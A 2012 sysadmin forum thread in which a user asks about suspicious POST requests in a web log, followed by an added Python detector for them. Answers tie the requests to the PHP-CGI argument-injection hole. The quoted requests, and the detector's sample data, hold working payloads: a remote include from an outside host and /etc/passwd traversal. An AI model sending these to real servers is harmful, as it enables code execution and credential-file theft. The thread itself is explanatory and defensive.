System administration
baalmor, 2012-12-07 14:20:35

What do these requests to the server do?

Hello.
I looked through the logs of requests to the www server and found an interesting POST request. Could you tell me what the author was trying to achieve?

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1"

along the way,
"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"

and
"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"

With these two requests, the essence is clear, but it is not clear what they were trying to exploit. Can someone satisfy my curiosity and maybe give me a warning? )
Thank you.


3 answer(s)
[email protected]><e, 2012-12-07
@baalmor

Looks like a relatively recent vulnerability (see comments).

den1n, 2012-12-07
@den1n

They tried to get the contents of the password file via the PHP instructions auto_prepend_file and allow_url_include.

egorinsk, 2012-12-07
@egorinsk

The hole was in PHP: if it is used in CGI mode, then with a certain confluence of stars this data is passed to it as command-line parameters and causes the code to be executed.
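
An added example, not part of the thread or of any answer above: a Python check that applies the CGI command-line rule from RFC 3875 to access-log request lines and reports which interpreter switches and `-d` directives a request would have handed to a CGI-mode PHP binary. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines shaped like the requests quoted in the question;
# 192.0.2.10 is a documentation address, not the host from the original log.
SAMPLE_LOG = [
    '"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D'
    'http://192.0.2.10/x.gif%20-n HTTP/1.1"',
    '"POST /?-d%20auto_prepend_file%3D../../etc/passwd%00%20-n HTTP/1.1"',
    '"GET /search.php?q=-d+test HTTP/1.1"',  # unencoded "=": ordinary form data
    '"GET /index.php?page=2&sort=-date HTTP/1.1"',
    '"GET /about.html HTTP/1.1"',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def cgi_argv(target):
    """Arguments a CGI program would be started with for this request target."""
    _, _, query = target.partition("?")
    # RFC 3875, 4.4: a query with no unencoded "=" is split on "+" and
    # URL-decoded into argv. The probes write "=" as %3D so the rule applies.
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]

def inspect(line):
    """Return the switches and -d directives carried by a log line, or None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # Flattened on whitespace for reporting only.
    tokens = " ".join(cgi_argv(match.group("target"))).split()
    switches = [t for t in tokens if t.startswith("-")]
    if not switches:
        return None
    directives = dict(
        nxt.split("=", 1)
        for cur, nxt in zip(tokens, tokens[1:])
        if cur == "-d" and "=" in nxt
    )
    return {"switches": switches, "directives": directives}

def scan(lines):
    """Map line number -> finding for each line that carries switches."""
    return {n: hit for n, line in enumerate(lines, 1) if (hit := inspect(line))}

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG).items():
        print(n, hit["switches"], hit["directives"])
```

A hit only shows that the request was shaped to reach the interpreter's command line; whether it had any effect depends on whether PHP on that server runs in CGI mode.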
